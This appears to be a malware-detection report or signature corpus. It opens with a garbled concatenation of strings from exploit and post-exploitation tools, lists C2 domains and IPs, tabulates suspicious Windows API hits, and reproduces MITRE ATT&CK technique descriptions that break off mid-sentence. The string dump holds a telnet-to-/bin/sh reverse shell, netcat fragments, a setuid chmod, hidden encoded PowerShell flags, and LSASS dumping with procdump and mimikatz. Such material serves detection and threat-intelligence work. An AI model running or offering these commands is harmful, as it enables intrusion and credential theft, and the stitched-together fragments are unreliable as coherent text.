$0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
18 user32.dll
1 user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
1 login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 login.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
1 useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 user-agent: %shost: %s:%dcache-control: no-cachecontent-type: application/x-octet-streampragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::d:\\:c:~:spmuvrcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto rept \\*.*.lnkdropped$innn[i$[i$^i[e[mdi[m$jf1wehn[^whl[^iin_hf$11mahzijnjbi[^[w[f1n$dej$[hn]1[w1ni1l[ic1j[mzjchl$$^he[[j[a[1_iwc[e[h$ywdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1w1[1cjm1[$[k1zw_$$ncn[[inbnnc[i9enanid[fzcx0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz!@#$%^&()`~-_=+[{]{;',.e_$0[bw\\rzy\\jb\\zy[nimirc[jrz]f_ridj0w9rfb[$fbc9[k_?wnhwi[$lz![nj_[[lk[8ihlo8ziil[[[$ynk[f_8[88wwwjw[ywnl$$z[ilf!$iz$!w>wl![w!k!$l!wow8$nj8![8n_i^$[>_n[zy[[xhn_c!nnfk[!z[i_^])[$n!]wj^,h[,!wzmk^o$dz[h[e!&w!l[$nd[d&)^z\\^[[iwh][[[jpyo[g$$e&n\\,wfg$[<g$[[ninn:j!!)wk[nj[[o!!ys
1 usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 user-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322software\\classes\\http\\shell\\open\\commandsystem\\controlset001\\services\\%sglobal\\%s-key-event%d%d.exeglobal\\%s-key-metuxget / http/1.1qy001id=%d;qy001guid=%s'sedebugprivilegeopen author: cyg07*2from golds7n[lag]'jdamageunhook iogetdeviceobjectpointer ok!\
1 login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
1 login information captured</b><br>user: %s<b>clipboard data captured</b><br>user: %sremoteexecwin32_processconnectserverroot\\cimv2impersonationlevelvarstorenumberintmicrosoft .net framework 2.0a: return type:i
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3

QBDETECT:DETECTION

Count Offset Rule Parsed Match
1 Unavailable API Alert None winexec
3 Unavailable API Alert None getstartupinfo
7 Unavailable API Alert None shellexecute
158 Unavailable API Alert None connect
2 Unavailable API Alert None createremotethread
1 Unavailable API Alert None regcreatekey
3 Unavailable API Alert None getthreadcontext
1 Unavailable API Alert None process32first
1 Unavailable API Alert None internetconnect
3 Unavailable API Alert None readfile
2 Unavailable API Alert None ftpputfile
92 Unavailable API Alert None send
4 Unavailable API Alert None getdc
1 Unavailable API Alert None openfilemapping
4 Unavailable API Alert None readprocessmemory
1 Unavailable API Alert None lsaenumeratelogonsessions
1 Unavailable API Alert None createmutex
1 Unavailable API Alert None certopensystemstore
84 Unavailable API Alert None loadlibrary
4 Unavailable API Alert None writefile
2 Unavailable API Alert None httpsendrequest
1 Unavailable API Alert None enumprocesses
3 Unavailable API Alert None resumethread
1 Unavailable API Alert None zwqueryinformation
1 Unavailable API Alert None checkremotedebuggerpresent
3 Unavailable API Alert None findresource
4 Unavailable API Alert None startservice
1 Unavailable API Alert None queueuserapc
1 Unavailable API Alert None internetwritefile
2 Unavailable API Alert None loadresource
7 Unavailable API Alert None createthread
4 Unavailable API Alert None gethostbyname
14 Unavailable API Alert None closehandle
1 Unavailable API Alert None internetclosehandle
21 Unavailable API Alert None listen
3 Unavailable API Alert None findnextfile
20 Unavailable API Alert None accept
2 Unavailable API Alert None wsastartup
2 Unavailable API Alert None setfilepointer
1 Unavailable API Alert None ntquerydirectoryfile
7 Unavailable API Alert None gettemppath
1 Unavailable API Alert None wsasend
1 Unavailable API Alert None wsasocket
1 Unavailable API Alert None peeknamedpipe
79 Unavailable API Alert None getprocaddress
2 Unavailable API Alert None lockresource
1 Unavailable API Alert None ntqueryinformationprocess
5 Unavailable API Alert None writeprocessmemory
3 Unavailable API Alert None copyfile
3 Unavailable API Alert None deletefile
4 Unavailable API Alert None adjusttokenprivileges
1 Unavailable API Alert None createservice
4 Unavailable API Alert None httpqueryinfo
3 Unavailable API Alert None isdebuggerpresent
10 Unavailable API Alert None sleep
3 Unavailable API Alert None findwindow
4 Unavailable API Alert None findfirstfile
1 Unavailable API Alert None ntsetinformationprocess
3 Unavailable API Alert None outputdebugstring
2 Unavailable API Alert None getasynckeystate
1 Unavailable API Alert None setwindowshook
1 Unavailable API Alert None getdrivetype
2 Unavailable API Alert None controlservice
1 Unavailable API Alert None isbadreadptr
4 Unavailable API Alert None deviceiocontrol
3 Unavailable API Alert None regclosekey
1 Unavailable API Alert None dnsquery
33 Unavailable API Alert None createfile
7 Unavailable API Alert None openprocess
1 Unavailable API Alert None samigetprivatedata
23 Unavailable API Alert None mapviewoffile
1 Unavailable API Alert None enableexecuteprotectionsupport
10 Unavailable API Alert None getmodulefilename
4 Unavailable API Alert None urldownload
1 Unavailable API Alert None bitblt
1 Unavailable API Alert None cryptacquirecontext
1 Unavailable API Alert None iswow64process
8 Unavailable API Alert None getsystemdirectory
1 Unavailable API Alert None enumprocessmodules
1 Unavailable API Alert None getfilesize
2 Unavailable API Alert None internetqueryoption
2 Unavailable API Alert None ftpgetfile
2 Unavailable API Alert None getusername
1 Unavailable API Alert None internetreadfile
22 Unavailable API Alert None recv
1 Unavailable API Alert None createtoolhelp32snapshot
26 Unavailable API Alert None bind
1 Unavailable API Alert None netshareenum
3 Unavailable API Alert None unhandledexceptionfilter
271 Unavailable API Alert None system
20 Unavailable API Alert None virtualfree
1 Unavailable API Alert None isbadwriteptr
29 Unavailable API Alert None socket
4 Unavailable API Alert None internetopen
33 Unavailable API Alert None getmodulehandle
1 Unavailable API Alert None gettickcount
25 Unavailable API Alert None exitprocess
1 Unavailable API Alert None process32next
2 Unavailable API Alert None terminateprocess
3 Unavailable API Alert None getversionex
3 Unavailable API Alert None regopenkey
1 Unavailable API Alert None widechartomultibyte
1 Unavailable API Alert None mapvirtualkey
11 Unavailable API Alert None getcommandline
4 Unavailable API Alert None setthreadcontext
1 Unavailable API Alert None samiconnect
1 Unavailable API Alert None getwindowsdirectory
14 Unavailable API Alert None createprocess
1 Unavailable API Alert None ftpopenfile
3 Unavailable API Alert None getcurrentprocess
1 Unavailable API Alert None getkeystate
2 Unavailable API Alert None createdirectory
1 Unavailable API Alert None regdeletekey
1 Unavailable API Alert None samqueryinformationuse
16 Unavailable API Alert None virtualprotect
41 Unavailable API Alert None virtualalloc
1 Unavailable API Alert None closesocket

MITRE:ATTACK

Id Name Detected Description
t1002 Data Compressed zip ,-recurse,rar ,tar An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
t1003 Credential Dumping sekurlsa::logonpasswords Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. ### Windows #### SAM (Security Accounts Manager) The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075): * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7) Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+. #### Cached Credentials The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: Cached credentials for Windows Vista are derived using PBKDF2. #### Local Security Authority (LSA) Secrets With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation. #### NTDS from Domain Controller Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy #### Group Policy Preference (GPP) Files Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts. These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP) The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) * gpprefdecrypt.py Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s * .xml #### Service Principal Names (SPNs) See [Kerberoasting](https://attack.mitre.org/techniques/T1208). #### Plaintext Credentials After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) The following tools can be used to enumerate credentials: * [Windows Credential Editor](https://attack.mitre.org/software/S0005) * [Mimikatz](https://attack.mitre.org/software/S0002) As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords #### DCSync DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017) ### Linux #### Proc filesystem The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
t1005 Data from Local System grep Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
t1007 System Service Discovery tasklist,net start,sc start Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.
t1012 Query Registry reg query Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.
t1016 System Network Configuration Discovery nbtscan,ipconfig Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
t1018 Remote System Discovery ping,admin$ Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. ### Windows Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system. ### Mac Specific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Linux Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.
t1022 Data Encrypted --password Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip. Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
t1031 Modify Existing Service sc config Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
t1033 System Owner/User Discovery systeminfo,whoami,users ### Windows Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. ### Mac On Mac, the currently logged in user can be identified with users,w, and who. ### Linux On Linux, the currently logged in user can be identified with w and who.
t1034 Path Interception net user Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. ### Unquoted Paths Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) ### PATH Environment Variable Misconfiguration The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. ### Search Order Hijacking Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).
t1035 Service Execution net stop,net start Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.
t1036 Masquerading /bin Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate. A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. ### Windows In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame 